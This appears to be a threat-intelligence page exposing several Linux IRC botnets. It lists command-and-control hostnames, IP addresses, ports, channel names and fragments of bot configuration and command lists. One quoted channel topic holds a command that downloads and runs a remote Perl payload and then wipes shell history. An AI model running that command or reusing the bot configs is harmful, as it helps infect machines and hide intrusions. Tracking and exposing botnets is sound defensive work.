Linux bots

comment.dyn.mk(Linux Irc Bots Hosted In Korea, Republic Of Seoul Sk Broadband Co Ltd)

Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] maybe hacked machine. $server = ‘comment.dyn.mk’ unless $server; my $port = ‘6667’; [11:00] * Now talking in #kill  (around 100 bots inside) [11:00] * Topic is ‘wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c ‘ [11:00] * Set by anonplus on Thu Jan 07 17:06:34 U

Linux Botnet Hosted In blackunix.us

This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV Now talking in #botnets Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ] Topic By : [ uyap ] Modes On : [ #botnets ] [ +smntrMuk fcuked ] The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log

ircd.freenetwork.com.ar (Linux botnet hosted in Korea, Republic Of Seoul Korea Internet Data Center)

Botnet found by X.  ircd.freenetwork.com.ar nick: addr: ircd.freenetwork.com.ar ip: 222.231.10.81 Longip: 3739683409 Server:  ircd.freenetwork.com.ar:6667 Channels: #org,#rpl,#root,#viar   Now 15 talking in #org Topic On : [ #org ] [ Don’t flood fuck || Register your nick… !!! [ SCAN ON ] || if you want to donate server,,please pm admin.. ] Hosting infos: http://whois.domaintools.com/222.231.10.81

bot.blackunix.us(Linux bots hosted in France Roubaix Ovh Systems)

Found by Yewnix. Resolved : [bot.blackunix.us] To [94.23.89.246]Resolved : [bot.blackunix.us] To [217.29.115.1]Resolved : [bot.blackunix.us] To [91.151.85.31]Resolved : [bot.blackunix.us] To [59.167.240.231]Resolved : [bot.blackunix.us] To [58.180.42.200]Resolved : [bot.blackunix.us] To [64.31.27.18] class pBot { var $config = array(“server”=>”bot.blackunix.us”, “port”=>”20”, “pass”=>””, “prefix”=>”Blood”, “maxrand”=>”15”, “key”=>”none”, “chan”=>”#metri”, “modes”=>”+ps”, “chan2″=>”#metri”, “password”=>”crack”, “trigger”=>”.”, “hostauth”=>”bogel.us” // * for any hostname (remember: /setvhost pasukan.ddos.reload-x.us) Hosting

203.81.204.105(14k Linux bots hosted in Pakistan Karachi South Cmbroadband Noc)

Big heckers big net. Thnx to loadx and Yewnix for the ownage and exposing them. Everything is inside the config file: /* Type of comments */ #Comment type 1 (Shell type) // Comment type 2(C++ style) /* Comment type 3 (C Style) */ #those lines are ignored by the ircd. loadmodule “src/modules/commands.so”; #loadmodule “cloak.dll”; #include

37.221.160.132 (Kaiten irc botnet hosted by voxility.net)

Server:  37.221.160.132 Port:  443 Channel:  #yodawg Channel password:  lol.WH #yodawg          58      [+smnu] yo dawg i herd u like backdoors so we put a backdoor in ur backdoor so u can get owned while u own  Check his server usage here: hxxp://fkn.ddos.cat/p.php Another one from x00 http://pastebin.com/fgjJGFxt Hosting infos:  http://whois.domaintools.com/37.221.160.132

208.89.209.54 (Irc botnet hosted by virpus.com)

Server:  208.89.209.54 Port:  6667 Current global users 77, max 695 Channels: #goon            3        #aryan           39       #OFFLINE#flood           1        ##yBz##          15       ##Offline##      19    Aryan bots: Channel:  #aryan Topic for #aryan is: #OFFLINE Topic for #aryan set by formality at Sun May 05 16:23:03 2013 Linux bots: Channel:  ##Offline## Channel:  ##yBz## Hosting infos:  http://whois.domaintools.com/208.89.209.54

irc.benjol.tk(Linux bots hosted in France Roubaix Ovh Systems)

Resolved : [irc.benjol.tk] To [37.59.42.103]Resolved : [irc.benjol.tk] To [46.45.183.189] GIF89a ? ????ÿÿÿ!ù ????,???? ? ?? D ?;?<? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to>